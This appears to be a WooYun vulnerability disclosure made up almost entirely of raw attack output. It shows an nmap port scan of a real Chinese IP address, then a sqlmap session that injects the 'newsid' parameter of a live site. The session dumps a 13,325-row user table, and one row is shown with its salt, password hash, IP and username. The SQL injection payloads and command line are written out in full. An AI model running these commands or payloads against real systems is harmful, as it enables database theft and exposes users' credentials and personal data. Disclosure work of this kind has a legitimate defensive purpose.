WooYun.org

Interesting ports on 61.136.101.200:
Not shown: 1667 closed ports
PORT     STATE    SERVICE        VERSION
80/tcp   open     http           Apache httpd 2.2.4 ((Win32) PHP/5.2.3)
135/tcp  filtered msrpc
136/tcp  filtered profile
137/tcp  filtered netbios-ns
138/tcp  filtered netbios-dgm
139/tcp  filtered netbios-ssn
445/tcp  filtered microsoft-ds
593/tcp  filtered http-rpc-epmap
1025/tcp open     msrpc          Microsoft Windows RPC
1433/tcp open     ms-sql-s?
3306/tcp open     mysql          MySQL (unauthorized)
3389/tcp open     microsoft-rdp  Microsoft Terminal Service
4444/tcp filtered krb524
No exact OS matches for host (If you know what OS is running on it, see http://www.insecure.org/cgi-bin/nmap-submit.cgi).
TCP/IP fingerprint:
SInfo(V=4.11%P=i686-redhat-linux-gnu%D=6/3%Tm=538DC0E3%O=80%C=1)
TSeq(Class=TR%IPID=RD%TS=0)
T1(Resp=Y%DF=N%W=4000%ACK=S++%Flags=AS%Ops=MNWNNT)
T2(Resp=Y%DF=N%W=0%ACK=S%Flags=AR%Ops=)
T3(Resp=Y%DF=N%W=4000%ACK=S++%Flags=AS%Ops=MNWNNT)
T4(Resp=Y%DF=N%W=0%ACK=O%Flags=R%Ops=)
T5(Resp=Y%DF=N%W=0%ACK=S++%Flags=AR%Ops=)
T6(Resp=Y%DF=N%W=0%ACK=O%Flags=R%Ops=)
T7(Resp=Y%DF=N%W=0%ACK=S++%Flags=AR%Ops=)
PU(Resp=Y%DF=N%TOS=0%IPLEN=B0%RIPTL=148%RID=E%RIPCK=E%UCK=E%ULEN=134%DAT=E)
Service Info: OS: Windows

root@bt:/pentest/database/sqlmap# ./sqlmap.py -u "http://60.172.12.41:309/Nav_lanmu.php?newsid=4096" --dump -D "0558_user" -T "uc_members"
    sqlmap/1.0-dev-25eca9d - automatic SQL injection and database takeover tool
    http://sqlmap.org
[!] legal disclaimer: usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Authors assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting at 10:44:26
[10:44:26] [INFO] resuming back-end DBMS 'mysql' 
[10:44:26] [INFO] testing connection to the target url
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: newsid
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: newsid=4096' AND 9216=9216 AND 'zLjT'='zLjT
    Type: UNION query
    Title: MySQL UNION query (NULL) - 4 columns
    Payload: newsid=4096' LIMIT 1,1 UNION ALL SELECT NULL, NULL, NULL, CONCAT(0x3a7169633a,0x6a586e614146614f6d6b,0x3a6b6e733a)#
    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: newsid=4096' AND SLEEP(5) AND 'Tojb'='Tojb
---
[10:44:27] [INFO] the back-end DBMS is MySQL
web server operating system: Windows 2003
web application technology: ASP.NET, Microsoft IIS 6.0, PHP 5.2.17
back-end DBMS: MySQL 5.0.11
[10:44:27] [INFO] fetching columns for table 'uc_members' in database '0558_user'
[10:44:27] [INFO] fetching entries for table 'uc_members' in database '0558_user'
[10:44:27] [WARNING] large output detected. This might take a while
[10:44:41] [INFO] analyzing table dump for possible password hashes
recognized possible password hashes in column 'password'. Do you want to crack them via a dictionary-based attack? [Y/n/q] n
Database: 0558_user
Table: uc_members
[13325 entries]
+--------+---------+---------+--------+-----------------+----------------------------------+--------+----------+------------+-----------------+----------------------------------+-----------+-------------+----------------------+---------------+
| uid    | myid    | myidkey | salt   | regip           | email                            | mail_v | secques  | regdate    | username        | password                         | mail_flag | lastloginip | password_str         | lastlogintime |
+--------+---------+---------+--------+-----------------+----------------------------------+--------+----------+------------+-----------------+----------------------------------+-----------+-------------+----------------------+---------------+
[10:45:53] [WARNING] console output will be trimmed to last 256 rows due to large table size
| 13262  | <blank> | <blank> | b4d037 | 114.96.60.71    | [email protected]                 | 1      | <blank>  | 1294987771 | E团购             | 7578b79806dd41ece401d7e188438594 | 5         | 0           | <blank>              | 0             |